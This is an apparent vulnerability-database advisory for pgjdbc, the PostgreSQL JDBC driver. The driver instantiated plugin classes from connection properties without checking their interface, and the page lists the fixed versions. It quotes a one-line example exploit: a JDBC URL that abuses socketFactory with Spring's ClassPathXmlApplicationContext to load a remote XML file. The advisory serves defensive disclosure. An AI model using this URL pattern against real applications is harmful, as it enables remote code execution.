VDB
Sign up
HIGH7.0

GHSA-v7wg-cpwc-24m4

pgjdbc Does Not Check Class Instantiation when providing Plugin Classes

Quick fix

GHSA-v7wg-cpwc-24m4 — org.postgresql:postgresql: upgrade to the fixed version with the command below.

# pom.xml: bump <version>42.2.25</version> for org.postgresql:postgresql

Details

### Impact

pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

``` DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml"); ```

The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)

Are you affected?

Enter the version of the package you're using.

Affected packages

Maven/org.postgresql:postgresql
Introduced in: 9.4.1208Fixed in: 42.2.25
Fix# pom.xml: bump <version>42.2.25</version> for org.postgresql:postgresql
Maven/org.postgresql:postgresql
Introduced in: 42.3.0Fixed in: 42.3.2
Fix# pom.xml: bump <version>42.3.2</version> for org.postgresql:postgresql

References